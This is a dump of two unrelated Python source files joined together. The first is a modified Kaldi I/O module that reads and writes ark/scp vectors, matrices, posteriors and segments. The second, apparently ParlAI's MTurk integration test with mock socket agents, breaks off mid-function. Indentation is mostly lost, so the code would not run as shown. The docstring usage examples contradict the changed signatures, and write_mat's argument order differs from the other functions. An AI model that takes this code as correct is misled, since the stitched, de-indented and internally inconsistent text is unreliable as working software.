""" generator(key,vec) = read_vec_int_ark(file_or_fd)
Create generator of (key,vector<int>) tuples, which reads from the ark file/stream.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Read ark to a 'dictionary':
d = { u:d for u,d in kaldi_io.read_vec_int_ark(file) }
"""
fd = open_or_fd(file_or_fd,output_folder)
try:
key = read_key(fd)
while key:
ali = read_vec_int(fd,output_folder)
yield key, ali
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_vec_int(file_or_fd,output_folder):
""" [int-vec] = read_vec_int(file_or_fd)
Read kaldi integer vector, ascii or binary input,
"""
fd = open_or_fd(file_or_fd,output_folder)
binary = fd.read(2).decode()
if binary == '\0B': # binary flag
assert(fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
if vec_size == 0:
return np.array([], dtype='int32')
    # Elements from the int32 vector are stored as tuples: (sizeof(int32), value),
vec = np.frombuffer(fd.read(vec_size*5), dtype=[('size','int8'),('value','int32')], count=vec_size)
assert(vec[0]['size'] == 4) # int32 size,
ans = vec[:]['value'] # values are in 2nd column,
else: # ascii,
arr = (binary + fd.readline().decode()).strip().split()
try:
arr.remove('['); arr.remove(']') # optionally
except ValueError:
pass
ans = np.array(arr, dtype=int)
if fd is not file_or_fd : fd.close() # cleanup
return ans
# Writing,
def write_vec_int(file_or_fd, output_folder, v, key=''):
""" write_vec_int(f, v, key='')
Write a binary kaldi integer vector to filename or stream.
Arguments:
file_or_fd : filename or opened file descriptor for writing,
v : the vector to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the vector.
Example of writing single vector:
kaldi_io.write_vec_int(filename, vec)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,vec in dict.iteritems():
kaldi_io.write_vec_flt(f, vec, key=key)
"""
fd = open_or_fd(file_or_fd, output_folder, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# dim,
fd.write('\4'.encode()) # int32 type,
fd.write(struct.pack(np.dtype('int32').char, v.shape[0]))
# data,
for i in range(len(v)):
fd.write('\4'.encode()) # int32 type,
fd.write(struct.pack(np.dtype('int32').char, v[i])) # binary,
finally:
if fd is not file_or_fd : fd.close()
#################################################
# Float vectors (confidences, ivectors, ...),
# Reading,
def read_vec_flt_scp(file_or_fd,output_folder):
""" generator(key,mat) = read_vec_flt_scp(file_or_fd)
Returns generator of (key,vector) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,vec in kaldi_io.read_vec_flt_scp(file):
...
Read scp to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_scp(file) }
"""
fd = open_or_fd(file_or_fd,output_folder)
try:
for line in fd:
(key,rxfile) = line.decode().split(' ')
vec = read_vec_flt(rxfile,output_folder)
yield key, vec
finally:
if fd is not file_or_fd : fd.close()
def read_vec_flt_ark(file_or_fd,output_folder):
""" generator(key,vec) = read_vec_flt_ark(file_or_fd)
Create generator of (key,vector<float>) tuples, reading from an ark file/stream.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Read ark to a 'dictionary':
d = { u:d for u,d in kaldi_io.read_vec_flt_ark(file) }
"""
fd = open_or_fd(file_or_fd,output_folder)
try:
key = read_key(fd)
while key:
ali = read_vec_flt(fd,output_folder)
yield key, ali
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_vec_flt(file_or_fd,output_folder):
""" [flt-vec] = read_vec_flt(file_or_fd)
Read kaldi float vector, ascii or binary input,
"""
fd = open_or_fd(file_or_fd,output_folder)
binary = fd.read(2).decode()
if binary == '\0B': # binary flag
return _read_vec_flt_binary(fd)
elif binary == 'RI':
return _read_vec_flt_riff(fd)
else: # ascii,
arr = (binary + fd.readline().decode()).strip().split()
try:
arr.remove('['); arr.remove(']') # optionally
except ValueError:
pass
ans = np.array(arr, dtype=float)
if fd is not file_or_fd : fd.close() # cleanup
return ans
def _read_vec_flt_riff(fd):
RIFF_CHUNK_DESCR_HEADER_SIZE = 12
ALREADY_READ_HEADER_BYTES = 2
SUB_CHUNK_HEADER_SIZE = 8
DATA_CHUNK_HEADER_SIZE = 8
def pcm2float(signal, dtype='float32'):
signal = np.asarray(signal)
dtype = np.dtype(dtype)
return signal.astype(dtype) / dtype.type(-np.iinfo(signal.dtype).min)
import struct
header = fd.read(RIFF_CHUNK_DESCR_HEADER_SIZE - ALREADY_READ_HEADER_BYTES)
assert header[:2] == b'FF'
chunk_header = fd.read(SUB_CHUNK_HEADER_SIZE)
subchunk_id, subchunk_size = struct.unpack('<4sI', chunk_header)
aformat, channels, samplerate, byterate, block_align, bps = struct.unpack('HHIIHH', fd.read(subchunk_size))
subchunk2_id, subchunk2_size = struct.unpack('<4sI', fd.read(DATA_CHUNK_HEADER_SIZE))
pcm_data = np.frombuffer(fd.read(subchunk2_size), dtype='int' + str(bps))
return pcm2float(pcm_data)
def _read_vec_flt_binary(fd):
header = fd.read(3).decode()
if header == 'FV ' : sample_size = 4 # floats
elif header == 'DV ' : sample_size = 8 # doubles
else : raise UnknownVectorHeader("The header contained '%s'" % header)
assert (sample_size > 0)
# Dimension,
assert (fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
if vec_size == 0:
return np.array([], dtype='float32')
# Read whole vector,
buf = fd.read(vec_size * sample_size)
if sample_size == 4 : ans = np.frombuffer(buf, dtype='float32')
elif sample_size == 8 : ans = np.frombuffer(buf, dtype='float64')
else : raise BadSampleSize
return ans
# Writing,
def write_vec_flt(file_or_fd, output_folder, v, key=''):
""" write_vec_flt(f, v, key='')
Write a binary kaldi vector to filename or stream. Supports 32bit and 64bit floats.
Arguments:
file_or_fd : filename or opened file descriptor for writing,
v : the vector to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the vector.
Example of writing single vector:
kaldi_io.write_vec_flt(filename, vec)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,vec in dict.iteritems():
kaldi_io.write_vec_flt(f, vec, key=key)
"""
fd = open_or_fd(file_or_fd,output_folder, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# Data-type,
if v.dtype == 'float32': fd.write('FV '.encode())
elif v.dtype == 'float64': fd.write('DV '.encode())
else: raise UnsupportedDataType("'%s', please use 'float32' or 'float64'" % v.dtype)
# Dim,
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, v.shape[0])) # dim
# Data,
fd.write(v.tobytes())
finally:
if fd is not file_or_fd : fd.close()
#################################################
# Float matrices (features, transformations, ...),
# Reading,
def read_mat_scp(file_or_fd,output_folder):
""" generator(key,mat) = read_mat_scp(file_or_fd)
Returns generator of (key,matrix) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,mat in kaldi_io.read_mat_scp(file):
...
Read scp to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_scp(file) }
"""
fd = open_or_fd(file_or_fd,output_folder)
try:
for line in fd:
(key,rxfile) = line.decode().split(' ')
mat = read_mat(rxfile,output_folder)
yield key, mat
finally:
if fd is not file_or_fd : fd.close()
def read_mat_ark(file_or_fd,output_folder):
""" generator(key,mat) = read_mat_ark(file_or_fd)
Returns generator of (key,matrix) tuples, read from ark file/stream.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the ark:
for key,mat in kaldi_io.read_mat_ark(file):
...
Read ark to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_ark(file) }
"""
fd = open_or_fd(file_or_fd,output_folder)
try:
key = read_key(fd)
while key:
mat = read_mat(fd,output_folder)
yield key, mat
key = read_key(fd)
finally:
if fd is not file_or_fd : fd.close()
def read_mat(file_or_fd,output_folder):
""" [mat] = read_mat(file_or_fd)
Reads single kaldi matrix, supports ascii and binary.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
"""
fd = open_or_fd(file_or_fd,output_folder)
try:
binary = fd.read(2).decode()
if binary == '\0B' :
mat = _read_mat_binary(fd)
else:
assert(binary == ' [')
mat = _read_mat_ascii(fd)
finally:
if fd is not file_or_fd: fd.close()
return mat
def _read_mat_binary(fd):
# Data type
header = fd.read(3).decode()
# 'CM', 'CM2', 'CM3' are possible values,
if header.startswith('CM'): return _read_compressed_mat(fd, header)
elif header == 'FM ': sample_size = 4 # floats
elif header == 'DM ': sample_size = 8 # doubles
else: raise UnknownMatrixHeader("The header contained '%s'" % header)
assert(sample_size > 0)
# Dimensions
s1, rows, s2, cols = np.frombuffer(fd.read(10), dtype='int8,int32,int8,int32', count=1)[0]
# Read whole matrix
buf = fd.read(rows * cols * sample_size)
if sample_size == 4 : vec = np.frombuffer(buf, dtype='float32')
elif sample_size == 8 : vec = np.frombuffer(buf, dtype='float64')
else : raise BadSampleSize
mat = np.reshape(vec,(rows,cols))
return mat
def _read_mat_ascii(fd):
rows = []
while 1:
line = fd.readline().decode()
if (len(line) == 0) : raise BadInputFormat # eof, should not happen!
if len(line.strip()) == 0 : continue # skip empty line
arr = line.strip().split()
if arr[-1] != ']':
rows.append(np.array(arr,dtype='float32')) # not last line
else:
rows.append(np.array(arr[:-1],dtype='float32')) # last line
mat = np.vstack(rows)
return mat
def _read_compressed_mat(fd, format):
""" Read a compressed matrix,
see: https://github.com/kaldi-asr/kaldi/blob/master/src/matrix/compressed-matrix.h
methods: CompressedMatrix::Read(...), CompressedMatrix::CopyToMat(...),
"""
assert(format == 'CM ') # The formats CM2, CM3 are not supported...
# Format of header 'struct',
global_header = np.dtype([('minvalue','float32'),('range','float32'),('num_rows','int32'),('num_cols','int32')]) # member '.format' is not written,
per_col_header = np.dtype([('percentile_0','uint16'),('percentile_25','uint16'),('percentile_75','uint16'),('percentile_100','uint16')])
# Read global header,
globmin, globrange, rows, cols = np.frombuffer(fd.read(16), dtype=global_header, count=1)[0]
  # The data is structured as [Colheader, ... , Colheader, Data, Data , .... ]
# { cols }{ size }
col_headers = np.frombuffer(fd.read(cols*8), dtype=per_col_header, count=cols)
col_headers = np.array([np.array([x for x in y]) * globrange * 1.52590218966964e-05 + globmin for y in col_headers], dtype=np.float32)
data = np.reshape(np.frombuffer(fd.read(cols*rows), dtype='uint8', count=cols*rows), newshape=(cols,rows)) # stored as col-major,
mat = np.zeros((cols,rows), dtype='float32')
p0 = col_headers[:, 0].reshape(-1, 1)
p25 = col_headers[:, 1].reshape(-1, 1)
p75 = col_headers[:, 2].reshape(-1, 1)
p100 = col_headers[:, 3].reshape(-1, 1)
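  # Dequantization: uint8 codes 0..64 are mapped linearly between the 0th and
  # 25th column percentiles, 65..192 between the 25th and 75th, and 193..255
  # between the 75th and 100th, as implemented by the three masks below.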
mask_0_64 = (data <= 64)
mask_193_255 = (data > 192)
mask_65_192 = (~(mask_0_64 | mask_193_255))
mat += (p0 + (p25 - p0) / 64. * data) * mask_0_64.astype(np.float32)
mat += (p25 + (p75 - p25) / 128. * (data - 64)) * mask_65_192.astype(np.float32)
mat += (p75 + (p100 - p75) / 63. * (data - 192)) * mask_193_255.astype(np.float32)
return mat.T # transpose! col-major -> row-major,
# Writing,
def write_mat(output_folder,file_or_fd, m, key=''):
""" write_mat(f, m, key='')
Write a binary kaldi matrix to filename or stream. Supports 32bit and 64bit floats.
Arguments:
file_or_fd : filename of opened file descriptor for writing,
m : the matrix to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the matrix.
Example of writing single matrix:
kaldi_io.write_mat(filename, mat)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,mat in dict.iteritems():
kaldi_io.write_mat(f, mat, key=key)
"""
fd = open_or_fd(file_or_fd, output_folder, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# Data-type,
if m.dtype == 'float32': fd.write('FM '.encode())
elif m.dtype == 'float64': fd.write('DM '.encode())
else: raise UnsupportedDataType("'%s', please use 'float32' or 'float64'" % m.dtype)
# Dims,
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, m.shape[0])) # rows
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, m.shape[1])) # cols
# Data,
fd.write(m.tobytes())
finally:
if fd is not file_or_fd : fd.close()
#################################################
# 'Posterior' kaldi type (posteriors, confusion network, nnet1 training targets, ...)
# Corresponds to: vector<vector<tuple<int,float> > >
# - outer vector: time axis
# - inner vector: records at the time
# - tuple: int = index, float = value
#
def read_cnet_ark(file_or_fd,output_folder):
""" Alias of function 'read_post_ark()', 'cnet' = confusion network """
return read_post_ark(file_or_fd,output_folder)
def read_post_rxspec(file_, output_folder):
  """ adaptor to read both 'ark:...' and 'scp:...' inputs of posteriors,
  (output_folder is threaded through to the underlying readers, as for the
  other read_* helpers in this file)
  """
  if file_.startswith("ark:"):
    return read_post_ark(file_, output_folder)
  elif file_.startswith("scp:"):
    return read_post_scp(file_, output_folder)
  else:
    print("unsupported input type: %s" % file_)
    print("it should begin with 'ark:' or 'scp:'")
    sys.exit(1)
def read_post_scp(file_or_fd,output_folder):
""" generator(key,post) = read_post_scp(file_or_fd)
Returns generator of (key,post) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,post in kaldi_io.read_post_scp(file):
...
Read scp to a 'dictionary':
d = { key:post for key,post in kaldi_io.read_post_scp(file) }
"""
fd = open_or_fd(file_or_fd,output_folder)
try:
for line in fd:
(key,rxfile) = line.decode().split(' ')
      post = read_post(rxfile, output_folder)
yield key, post
finally:
if fd is not file_or_fd : fd.close()
def read_post_ark(file_or_fd,output_folder):
""" generator(key,vec<vec<int,float>>) = read_post_ark(file)
Returns generator of (key,posterior) tuples, read from ark file.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Iterate the ark:
for key,post in kaldi_io.read_post_ark(file):
...
Read ark to a 'dictionary':
d = { key:post for key,post in kaldi_io.read_post_ark(file) }
"""
fd = open_or_fd(file_or_fd,output_folder)
try:
key = read_key(fd)
while key:
      post = read_post(fd, output_folder)
yield key, post
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_post(file_or_fd,output_folder):
""" [post] = read_post(file_or_fd)
Reads single kaldi 'Posterior' in binary format.
The 'Posterior' is C++ type 'vector<vector<tuple<int,float> > >',
the outer-vector is usually time axis, inner-vector are the records
at given time, and the tuple is composed of an 'index' (integer)
and a 'float-value'. The 'float-value' can represent a probability
or any other numeric value.
Returns vector of vectors of tuples.
"""
fd = open_or_fd(file_or_fd,output_folder)
ans=[]
binary = fd.read(2).decode(); assert(binary == '\0B'); # binary flag
assert(fd.read(1).decode() == '\4'); # int-size
outer_vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of frames (or bins)
# Loop over 'outer-vector',
for i in range(outer_vec_size):
assert(fd.read(1).decode() == '\4'); # int-size
inner_vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of records for frame (or bin)
data = np.frombuffer(fd.read(inner_vec_size*10), dtype=[('size_idx','int8'),('idx','int32'),('size_post','int8'),('post','float32')], count=inner_vec_size)
assert(data[0]['size_idx'] == 4)
assert(data[0]['size_post'] == 4)
ans.append(data[['idx','post']].tolist())
if fd is not file_or_fd: fd.close()
return ans
#################################################
# Kaldi Confusion Network bin begin/end times,
# (kaldi stores CNs time info separately from the Posterior).
#
def read_cntime_ark(file_or_fd,output_folder):
""" generator(key,vec<tuple<float,float>>) = read_cntime_ark(file_or_fd)
Returns generator of (key,cntime) tuples, read from ark file.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
Iterate the ark:
for key,time in kaldi_io.read_cntime_ark(file):
...
Read ark to a 'dictionary':
d = { key:time for key,time in kaldi_io.read_post_ark(file) }
"""
fd = open_or_fd(file_or_fd,output_folder)
try:
key = read_key(fd)
while key:
      cntime = read_cntime(fd, output_folder)
yield key, cntime
key = read_key(fd)
finally:
if fd is not file_or_fd : fd.close()
def read_cntime(file_or_fd,output_folder):
""" [cntime] = read_cntime(file_or_fd)
Reads single kaldi 'Confusion Network time info', in binary format:
C++ type: vector<tuple<float,float> >.
(begin/end times of bins at the confusion network).
Binary layout is '<num-bins> <beg1> <end1> <beg2> <end2> ...'
file_or_fd : file, gzipped file, pipe or opened file descriptor.
Returns vector of tuples.
"""
fd = open_or_fd(file_or_fd,output_folder)
binary = fd.read(2).decode(); assert(binary == '\0B'); # assuming it's binary
assert(fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of frames (or bins)
data = np.frombuffer(fd.read(vec_size*10), dtype=[('size_beg','int8'),('t_beg','float32'),('size_end','int8'),('t_end','float32')], count=vec_size)
assert(data[0]['size_beg'] == 4)
assert(data[0]['size_end'] == 4)
ans = data[['t_beg','t_end']].tolist() # Return vector of tuples (t_beg,t_end),
if fd is not file_or_fd : fd.close()
return ans
#################################################
# Segments related,
#
# Segments as 'Bool vectors' can be handy,
# - for 'superposing' the segmentations,
# - for frame-selection in Speaker-ID experiments,
def read_segments_as_bool_vec(segments_file):
""" [ bool_vec ] = read_segments_as_bool_vec(segments_file)
using kaldi 'segments' file for 1 wav, format : '<utt> <rec> <t-beg> <t-end>'
- t-beg, t-end is in seconds,
- assumed 100 frames/second,
"""
segs = np.loadtxt(segments_file, dtype='object,object,f,f', ndmin=1)
# Sanity checks,
assert(len(segs) > 0) # empty segmentation is an error,
assert(len(np.unique([rec[1] for rec in segs ])) == 1) # segments with only 1 wav-file,
# Convert time to frame-indexes,
start = np.rint([100 * rec[2] for rec in segs]).astype(int)
end = np.rint([100 * rec[3] for rec in segs]).astype(int)
# Taken from 'read_lab_to_bool_vec', htk.py,
frms = np.repeat(np.r_[np.tile([False,True], len(end)), False],
np.r_[np.c_[start - np.r_[0, end[:-1]], end-start].flat, 0])
assert np.sum(end-start) == np.sum(frms)
return frms
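# Example (illustrative segments content for a single recording):
#   utt1 rec1 0.50 1.20
#   utt2 rec1 2.00 2.30
# With the assumed 100 frames/second this yields a bool vector that is True for
# frames 50-119 and 200-229 and False everywhere else.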
integration_test.py
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
"""
Script for testing complete functionality of the MTurk conversation backend.
Simulates agents and interactions and tests the outcomes of interacting with
the server to ensure that the messages received are as intended.
It pretends to act in the way that core.html is supposed to follow, both
related to what is sent and received, what fields are checked, etc. A change
to the core.html file will not be caught by this script.
Doesn't actually interact with Amazon MTurk as they don't offer a robust
testing framework as of September 2017, so interactions with MTurk and updating
HIT status and things of the sort are not yet supported in this testing.
"""
from parlai.core.params import ParlaiParser
from parlai.mturk.core.test.integration_test.worlds import TestOnboardWorld, \
TestSoloWorld, TestDuoWorld
from parlai.mturk.core.mturk_manager import MTurkManager, WORLD_START_TIMEOUT
from parlai.mturk.core.server_utils import setup_server, delete_server
from parlai.mturk.core.socket_manager import Packet, SocketManager
from parlai.mturk.core.worker_state import WorkerState, AssignState
from parlai.mturk.core.agents import MTURK_DISCONNECT_MESSAGE
import parlai.mturk.core.data_model as data_model
from parlai.mturk.core.mturk_utils import create_hit_config
from socketIO_client_nexus import SocketIO
import time
import os
import importlib
import copy
import uuid
import threading
from itertools import product
from joblib import Parallel, delayed
TEST_TASK_DESCRIPTION = 'This is a test task description'
MTURK_AGENT_IDS = ['TEST_USER_1', 'TEST_USER_2']
PORT = 443
FAKE_HIT_ID = 'FAKE_HIT_ID_{}'
TASK_GROUP_ID = 'TEST_TASK_GROUP_{}'
AGENT_1_ID = 'TEST_AGENT_1'
AGENT_2_ID = 'TEST_AGENT_2'
ASSIGN_1_ID = 'FAKE_ASSIGNMENT_ID_1'
HIT_1_ID = 'FAKE_HIT_ID_1'
SOCKET_TEST = 'SOCKET_TEST'
SOLO_ONBOARDING_TEST = 'SOLO_ONBOARDING_TEST'
SOLO_NO_ONBOARDING_TEST = 'SOLO_NO_ONBOARDING_TEST'
SOLO_REFRESH_TEST = 'SOLO_REFRESH_TEST'
DUO_ONBOARDING_TEST = 'DUO_ONBOARDING_TEST'
DUO_NO_ONBOARDING_TEST = 'DUO_NO_ONBOARDING_TEST'
DUO_VALID_RECONNECT_TEST = 'DUO_VALID_RECONNECT_TEST'
DUO_ONE_DISCONNECT_TEST = 'DUO_ONE_DISCONNECT_TEST'
COUNT_COMPLETE_TEST = 'COUNT_COMPLETE_TEST'
EXPIRE_HIT_TEST = 'EXPIRE_HIT_TEST'
ALLOWED_CONVERSATION_TEST = 'ALLOWED_CONVERSATION_TEST'
UNIQUE_CONVERSATION_TEST = 'UNIQUE_CONVERSATION_TEST'
FAKE_ASSIGNMENT_ID = 'FAKE_ASSIGNMENT_ID_{}_{}'
FAKE_WORKER_ID = 'FAKE_WORKER_ID_{}_{}'
DISCONNECT_WAIT_TIME = SocketManager.DEF_SOCKET_TIMEOUT + 1.5
completed_threads = {}
start_times = {}
def dummy(*args):
pass
class MockAgent(object):
"""Class that pretends to be an MTurk agent interacting through the
webpage by simulating the same commands that are sent from the core.html
file. Exposes methods to use for testing and checking status
"""
def __init__(self, opt, hit_id, assignment_id, worker_id, task_group_id):
self.conversation_id = None
self.id = None
self.assignment_id = assignment_id
self.hit_id = hit_id
self.worker_id = worker_id
self.some_agent_disconnected = False
self.disconnected = False
self.task_group_id = task_group_id
self.socketIO = None
self.always_beat = False
self.ready = False
self.wants_to_send = False
def send_packet(self, packet):
def callback(*args):
pass
event_name = data_model.SOCKET_ROUTE_PACKET_STRING
self.socketIO.emit(event_name, packet.as_dict())
def build_and_send_packet(self, packet_type, data, callback):
if not callback:
def callback(*args):
pass
msg = {
'id': str(uuid.uuid4()),
'type': packet_type,
'sender_id': self.worker_id,
'assignment_id': self.assignment_id,
'conversation_id': self.conversation_id,
'receiver_id': '[World_' + self.task_group_id + ']',
'data': data
}
event_name = data_model.SOCKET_ROUTE_PACKET_STRING
if (packet_type == Packet.TYPE_ALIVE):
event_name = data_model.SOCKET_AGENT_ALIVE_STRING
self.socketIO.emit(event_name, msg, callback)
def send_message(self, text, callback=dummy):
if not callback:
def callback(*args):
pass
data = {
'text': text,
'id': self.id,
'message_id': str(uuid.uuid4()),
'episode_done': False
}
self.wants_to_send = False
self.build_and_send_packet(Packet.TYPE_MESSAGE, data, callback)
def send_alive(self):
data = {
'hit_id': self.hit_id,
'assignment_id': self.assignment_id,
'worker_id': self.worker_id,
'conversation_id': self.conversation_id
}
self.build_and_send_packet(Packet.TYPE_ALIVE, data, None)
def setup_socket(self, server_url, message_handler):
"""Sets up a socket for an agent"""
def on_socket_open(*args):
self.send_alive()
def on_new_message(*args):
message_handler(args[0])
def on_disconnect(*args):
self.disconnected = True
self.socketIO = SocketIO(server_url, PORT)
# Register Handlers
self.socketIO.on(data_model.SOCKET_OPEN_STRING, on_socket_open)
self.socketIO.on(data_model.SOCKET_DISCONNECT_STRING, on_disconnect)
self.socketIO.on(data_model.SOCKET_NEW_PACKET_STRING, on_new_message)
# Start listening thread
self.listen_thread = threading.Thread(target=self.socketIO.wait)
self.listen_thread.daemon = True
self.listen_thread.start()
def send_heartbeat(self):
"""Sends a heartbeat to the world"""
hb = {
'id': str(uuid.uuid4()),
'receiver_id': '[World_' + self.task_group_id + ']',
'assignment_id': self.assignment_id,
'sender_id' : self.worker_id,
'conversation_id': self.conversation_id,
'type': Packet.TYPE_HEARTBEAT,
'data': None
}
self.socketIO.emit(data_model.SOCKET_ROUTE_PACKET_STRING, hb)
def wait_for_alive(self):
last_time = time.time()
while not self.ready:
self.send_alive()
time.sleep(0.5)
assert time.time() - last_time < 10, \
                'Timed out waiting for server to acknowledge {} alive'.format(
self.worker_id
)
def handle_setup(opt):
"""Prepare the heroku server without creating real hits"""
create_hit_config(
task_description=TEST_TASK_DESCRIPTION,
unique_worker=False,
is_sandbox=True
)
    # Populate files to copy over to the server
task_files_to_copy = []
task_directory_path = os.path.join(
opt['parlai_home'],
'parlai',
'mturk',
'core',
'test',
'integration_test'
)
task_files_to_copy.append(
os.path.join(task_directory_path, 'html', 'cover_page.html'))
for mturk_agent_id in MTURK_AGENT_IDS + ['onboarding']:
task_files_to_copy.append(os.path.join(
task_directory_path,
'html',
'{}_index.html'.format(mturk_agent_id)
))
# Setup the server with a likely-unique app-name
task_name = '{}-{}'.format(str(uuid.uuid4())[:8], 'integration_test')
server_task_name = \
''.join(e for e in task_name if e.isalnum() or e == '-')
server_url = \
setup_server(server_task_name, task_files_to_copy)
return server_task_name, server_url
def handle_shutdown(server_task_name):
delete_server(server_task_name)
def wait_for_state_time(seconds, mturk_manager):
seconds_done = 0
while (seconds_done < seconds):
if mturk_manager.socket_manager.alive:
seconds_done += 0.1
time.sleep(0.1)
def run_solo_world(opt, mturk_manager, is_onboarded):
MTURK_SOLO_WORKER = 'MTURK_SOLO_WORKER'
# Runs the solo test world with or without onboarding
def run_onboard(worker):
world = TestOnboardWorld(opt=opt, mturk_agent=worker)
while not world.episode_done():
world.parley()
world.shutdown()
if is_onboarded:
mturk_manager.set_onboard_function(onboard_function=run_onboard)
else:
mturk_manager.set_onboard_function(onboard_function=None)
try:
mturk_manager.ready_to_accept_workers()
def check_worker_eligibility(worker):
return True
def assign_worker_roles(workers):
workers[0].id = MTURK_SOLO_WORKER
global run_conversation
def run_conversation(mturk_manager, opt, workers):
task = opt['task']
mturk_agent = workers[0]
world = TestSoloWorld(opt=opt, task=task, mturk_agent=mturk_agent)
while not world.episode_done():
world.parley()
world.shutdown()
mturk_manager.start_task(
eligibility_function=check_worker_eligibility,
assign_role_function=assign_worker_roles,
task_function=run_conversation
)
except:
raise
finally:
pass
def run_duo_world(opt, mturk_manager, is_onboarded):
MTURK_DUO_WORKER = 'MTURK_DUO_WORKER'
    # Runs the duo test world with or without onboarding
def run_onboard(worker):
world = TestOnboardWorld(opt=opt, mturk_agent=worker)
while not world.episode_done():
world.parley()
world.shutdown()
if is_onboarded:
mturk_manager.set_onboard_function(onboard_function=run_onboard)
else:
mturk_manager.set_onboard_function(onboard_function=None)
try:
mturk_manager.ready_to_accept_workers()
def check_worker_eligibility(worker):
return True
def assign_worker_roles(workers):
for worker in workers:
worker.id = MTURK_DUO_WORKER
global run_conversation
def run_conversation(mturk_manager, opt, workers):
world = TestDuoWorld(opt=opt, agents=workers)
while not world.episode_done():
world.parley()
world.shutdown()
mturk_manager.start_task(
eligibility_function=check_worker_eligibility,
assign_role_function=assign_worker_roles,
task_function=run_conversation
)
except:
raise
finally:
pass
def make_packet_handler_cant_task(agent, on_ack, on_hb, on_msg):
"""A packet handler that is unable to switch into task worlds"""
def handler_mock(pkt):
if pkt['type'] == Packet.TYPE_ACK:
agent.ready = True
packet = Packet.from_dict(pkt)
on_ack(packet)
elif pkt['type'] == Packet.TYPE_HEARTBEAT:
packet = Packet.from_dict(pkt)
on_hb(packet)
time.sleep(1)
if agent.always_beat:
agent.send_heartbeat()
elif pkt['type'] == Packet.TYPE_MESSAGE:
packet = Packet.from_dict(pkt)
if agent.always_beat:
agent.send_packet(packet.get_ack())
on_msg(packet)
if packet.data['text'] == data_model.COMMAND_CHANGE_CONVERSATION:
if not agent.always_beat:
pass
elif not packet.data['conversation_id'].startswith('t_'):
agent.conversation_id = packet.data['conversation_id']
agent.id = packet.data['agent_id']
agent.send_alive()
else:
agent.always_beat = False
elif pkt['type'] == Packet.TYPE_ALIVE:
raise Exception('Invalid alive packet {}'.format(pkt))
else:
raise Exception('Invalid Packet type {} received in {}'.format(
pkt['type'],
pkt
))
return handler_mock
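# Standard mock packet handler: acks incoming messages, keeps answering
# heartbeats while agent.always_beat is set, and follows
# COMMAND_CHANGE_CONVERSATION commands into both onboarding and task worlds
# (unlike the _cant_task variant above, which refuses to enter task worlds).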
def make_packet_handler(agent, on_ack, on_hb, on_msg):
def handler_mock(pkt):
if pkt['type'] == Packet.TYPE_ACK:
agent.ready = True
packet = Packet.from_dict(pkt)
on_ack(packet)
elif pkt['type'] == Packet.TYPE_HEARTBEAT:
packet = Packet.from_dict(pkt)
on_hb(packet)
time.sleep(1)
if agent.always_beat:
agent.send_heartbeat()
elif pkt['type'] == Packet.TYPE_MESSAGE:
packet = Packet.from_dict(pkt)
agent.send_packet(packet.get_ack())
on_msg(packet)
if packet.data['text'] == data_model.COMMAND_CHANGE_CONVERSATION:
agent.conversation_id = packet.data['conversation_id']
agent.id = packet.data['agent_id']
agent.send_alive()
elif pkt['type'] == Packet.TYPE_ALIVE:
raise Exception('Invalid alive packet {}'.format(pkt))
else:
raise Exception('Invalid Packet type {} received in {}'.format(
pkt['type'],
pkt
))
return handler_mock
def check_status(input_status, desired_status):
assert input_status == desired_status, 'Expected to be in {}, was found ' \
'in {}'.format(desired_status, input_status)
def check_new_agent_setup(agent, mturk_manager,
status=AssignState.STATUS_ONBOARDING):
mturk_agent = mturk_manager.mturk_workers[agent.worker_id]
assert mturk_agent is not None, \
'MTurk manager did not make a worker state on alive'
mturk_assign = mturk_agent.agents[agent.assignment_id]
assert mturk_assign is not None, \
'MTurk manager did not make an assignment state on alive'
assert mturk_assign.state.status == status, \
'MTurk manager did not move the agent into {}, stuck in {}'.format(
status, mturk_assign.state.status
)
connection_id = mturk_assign.get_connection_id()
